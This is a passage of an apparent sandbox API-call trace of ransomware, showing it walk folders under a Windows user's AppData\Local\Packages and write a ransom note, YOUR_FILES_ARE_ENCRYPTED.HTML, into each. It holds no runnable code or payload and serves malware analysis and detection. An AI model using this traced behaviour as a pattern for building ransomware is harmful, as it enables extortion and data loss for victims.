lpFindFileData=0x19e1c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85038b9a, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x85038b9a, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0xd916deee, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x2f68, dwReserved0=0x63d15a, dwReserved1=0x63d090, cFileName="TileCache_100_0_Header.bin", cAlternateFileName="TILECA~1.BIN")) returned 0 [0119.857] FindClose (in: hFindFile=0x626978 | out: hFindFile=0x626978) returned 1 [0119.857] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\TempState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 140 [0119.857] GetProcessHeap () returned 0x600000 [0119.857] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x30f4fc8 [0119.858] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\TempState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.shellexperiencehost_cw5n1h2txyewy\\tempstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0119.861] WriteFile (in: hFile=0x320, lpBuffer=0x30f4fc8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x30f4fc8*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0119.862] CloseHandle (hObject=0x320) returned 1 [0119.862] GetProcessHeap () returned 0x600000 [0119.862] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f4fc8 | out: hHeap=0x600000) returned 1 [0119.862] GetProcessHeap () returned 0x600000 [0119.862] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0119.863] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a0d549b, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5a0d549b, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x8505eedb, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 0 [0119.864] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0119.864] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 130 [0119.864] GetProcessHeap () returned 0x600000 [0119.864] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x314b010 [0119.864] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.shellexperiencehost_cw5n1h2txyewy\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0119.866] WriteFile (in: hFile=0x214, lpBuffer=0x314b010*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e7a4, lpOverlapped=0x0 | out: lpBuffer=0x314b010*, lpNumberOfBytesWritten=0x19e7a4*=0x3c00, lpOverlapped=0x0) returned 1 [0119.867] CloseHandle (hObject=0x214) returned 1 [0119.867] GetProcessHeap () returned 0x600000 [0119.867] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0119.867] GetProcessHeap () returned 0x600000 [0119.867] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0119.867] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec6e67c2, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xec922b53, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xeda459b8, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e94c, dwReserved1=0x39f712c, cFileName="Microsoft.WindowsAlarms_8wekyb3d8bbwe", cAlternateFileName="MICROS~3.WIN")) returned 1 [0119.867] StrStrIW (lpFirst="Microsoft.WindowsAlarms_8wekyb3d8bbwe", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.867] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe") returned 86 [0119.867] GetProcessHeap () returned 0x600000 [0119.867] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0119.867] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe" [0119.868] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\*" [0119.868] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec6e67c2, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xec922b53, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xeda459b8, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0119.870] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec6e67c2, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xec922b53, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xeda459b8, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="..", cAlternateFileName="")) returned 1 [0119.870] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xec922b53, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xec922b53, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xeca077cc, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="AC", cAlternateFileName="")) returned 1 [0119.870] StrStrIW (lpFirst="AC", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.870] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AC") returned 89 [0119.870] GetProcessHeap () returned 0x600000 [0119.870] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0119.871] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AC" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AC") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AC" [0119.871] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AC", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AC\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AC\\*" [0119.871] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AC\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xec922b53, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xec922b53, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xeca077cc, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6da3c6, dwReserved1=0x6da318, cFileName=".", cAlternateFileName="")) returned 0x6267b8 [0119.874] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xec922b53, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xec922b53, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xeca077cc, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6da3c6, dwReserved1=0x6da318, cFileName="..", cAlternateFileName="")) returned 1 [0119.874] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xec922b53, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xec922b53, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xec922b53, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6da3c6, dwReserved1=0x6da318, cFileName="INetCache", cAlternateFileName="INETCA~1")) returned 1 [0119.874] StrStrIW (lpFirst="INetCache", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.874] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AC\\INetCache") returned 99 [0119.874] GetProcessHeap () returned 0x600000 [0119.874] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f4fc8 [0119.875] lstrcpyW (in: lpString1=0x30f4fc8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AC\\INetCache" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AC\\INetCache") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AC\\INetCache" [0119.875] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AC\\INetCache", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AC\\INetCache\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AC\\INetCache\\*" [0119.875] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AC\\INetCache\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xec922b53, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xec922b53, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xec922b53, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6da858, dwReserved1=0x6da320, cFileName=".", cAlternateFileName="")) returned 0x6268f8 [0119.876] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xec922b53, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xec922b53, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xec922b53, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6da858, dwReserved1=0x6da320, cFileName="..", cAlternateFileName="")) returned 1 [0119.876] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xec922b53, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xec922b53, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xec922b53, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6da858, dwReserved1=0x6da320, cFileName="..", cAlternateFileName="")) returned 0 [0119.876] FindClose (in: hFindFile=0x6268f8 | out: hFindFile=0x6268f8) returned 1 [0119.876] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AC\\INetCache\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 129 [0119.877] GetProcessHeap () returned 0x600000 [0119.877] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3104fd0 [0119.877] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AC\\INetCache\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowsalarms_8wekyb3d8bbwe\\ac\\inetcache\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0119.890] WriteFile (in: hFile=0x324, lpBuffer=0x3104fd0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x3104fd0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0119.891] CloseHandle (hObject=0x324) returned 1 [0119.891] GetProcessHeap () returned 0x600000 [0119.892] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3104fd0 | out: hHeap=0x600000) returned 1 [0119.892] GetProcessHeap () returned 0x600000 [0119.892] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f4fc8 | out: hHeap=0x600000) returned 1 [0119.892] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xec9e1598, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xec9e1598, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xec9e1598, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6da3c6, dwReserved1=0x6da318, cFileName="INetCookies", cAlternateFileName="INETCO~1")) returned 1 [0119.892] StrStrIW (lpFirst="INetCookies", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.892] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AC\\INetCookies") returned 101 [0119.892] GetProcessHeap () returned 0x600000 [0119.892] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f4fc8 [0119.892] lstrcpyW (in: lpString1=0x30f4fc8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AC\\INetCookies" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AC\\INetCookies") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AC\\INetCookies" [0119.892] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AC\\INetCookies", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AC\\INetCookies\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AC\\INetCookies\\*" [0119.892] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AC\\INetCookies\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xec9e1598, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xec9e1598, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xec9e1598, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6da858, dwReserved1=0x6da320, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0119.892] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xec9e1598, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xec9e1598, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xec9e1598, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6da858, dwReserved1=0x6da320, cFileName="..", cAlternateFileName="")) returned 1 [0119.892] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xec9e1598, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xec9e1598, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xec9e1598, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6da858, dwReserved1=0x6da320, cFileName="..", cAlternateFileName="")) returned 0 [0119.892] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0119.893] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AC\\INetCookies\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 131 [0119.893] GetProcessHeap () returned 0x600000 [0119.893] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3104fd0 [0119.893] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AC\\INetCookies\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowsalarms_8wekyb3d8bbwe\\ac\\inetcookies\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0119.894] WriteFile (in: hFile=0x324, lpBuffer=0x3104fd0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x3104fd0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0119.896] CloseHandle (hObject=0x324) returned 1 [0119.896] GetProcessHeap () returned 0x600000 [0119.896] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3104fd0 | out: hHeap=0x600000) returned 1 [0119.896] GetProcessHeap () returned 0x600000 [0119.896] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f4fc8 | out: hHeap=0x600000) returned 1 [0119.896] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xec9e1598, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xec9e1598, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xec9e1598, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6da3c6, dwReserved1=0x6da318, cFileName="INetHistory", cAlternateFileName="INETHI~1")) returned 1 [0119.896] StrStrIW (lpFirst="INetHistory", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.896] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AC\\INetHistory") returned 101 [0119.896] GetProcessHeap () returned 0x600000 [0119.896] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f4fc8 [0119.896] lstrcpyW (in: lpString1=0x30f4fc8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AC\\INetHistory" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AC\\INetHistory") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AC\\INetHistory" [0119.896] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AC\\INetHistory", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AC\\INetHistory\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AC\\INetHistory\\*" [0119.896] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AC\\INetHistory\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xec9e1598, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xec9e1598, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xec9e1598, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6da858, dwReserved1=0x6da320, cFileName=".", cAlternateFileName="")) returned 0x626638 [0119.897] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xec9e1598, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xec9e1598, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xec9e1598, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6da858, dwReserved1=0x6da320, cFileName="..", cAlternateFileName="")) returned 1 [0119.897] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xec9e1598, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xec9e1598, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xec9e1598, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6da858, dwReserved1=0x6da320, cFileName="..", cAlternateFileName="")) returned 0 [0119.897] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0119.897] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AC\\INetHistory\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 131 [0119.897] GetProcessHeap () returned 0x600000 [0119.897] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3104fd0 